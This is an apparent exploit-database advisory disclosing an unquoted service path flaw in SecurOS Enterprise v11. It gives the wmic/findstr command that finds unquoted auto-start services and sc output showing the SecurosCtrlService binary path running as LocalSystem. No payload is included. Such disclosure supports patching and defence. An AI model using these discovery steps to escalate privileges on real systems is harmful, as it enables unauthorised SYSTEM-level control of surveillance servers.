# Exploit Title: Intelligent Security System SecurOS Enterprise v11 -
Unquoted Service Path
# Date: 2024-11-25
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# t.me/Ci3c0
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Vendor Homepage:
https://www.issivs.com/product-detail/secure-os-enterprise/
# Software Link: https://www.issivs.com/schedule-a-free-demo/
# Version: 11
# Tested on: Windows 10 Pro x64 Esp

# Version: 11

# Schedule A Free Demo - ISS - Intelligent Security Systems<
https://www.issivs.com/schedule-a-free-demo/>
# Schedule a Free Demo A leading developer of security surveillance and
control systems for
# networked digital video and audio recording, video image pattern
processing and digital data transmission.
# www.issivs.com

# Summary: ISS’ global standard for video management, access control and
video analytics, SecurOS™ Enterprise is perfectly suited for
# managing large and demanding installations. The Enterprise framework can
manage and monitor an unlimited number of cameras and devices, apply
# intelligent video analytics, and act as an integration platform for a
variety of 3rd party systems. Built to handle enterprise level deployments,
# SecurOS Enterprise, comes with built-in Native Failure functionality,
Microsoft Active Directory / LDAP integration, and has an extensive set
# of Cybersecurity features making it one of the most reliable and secure
video management platforms in the market today. SecurOS Enterprise
# supports all the features of the other 3 editions.

# Description:    The application suffers from an unquoted search path
issue impacting the service 'SecurosCtrlService'. This could potentially
allow an
# authorized but non-privileged local user to execute arbitrary code with
elevated privileges on the system. A successful attempt would require
# the local user to be able to insert their code in the system root path
undetected by the OS or other security applications where it could
# potentially be executed during application startup or reboot. If
successful, the local user’s code would execute with the elevated privileges
# of the application.

# Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode |
findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

SecurOS Control Service SecurosCtrlService C:\Program Files
(x86)\ISS\SecurOS\securos_svc.exe Auto

# Service info:

C:\>sc qc SecurosCtrlService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SecurosCtrlService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\ISS\SecurOS\securos_svc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : SecurOS Control Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem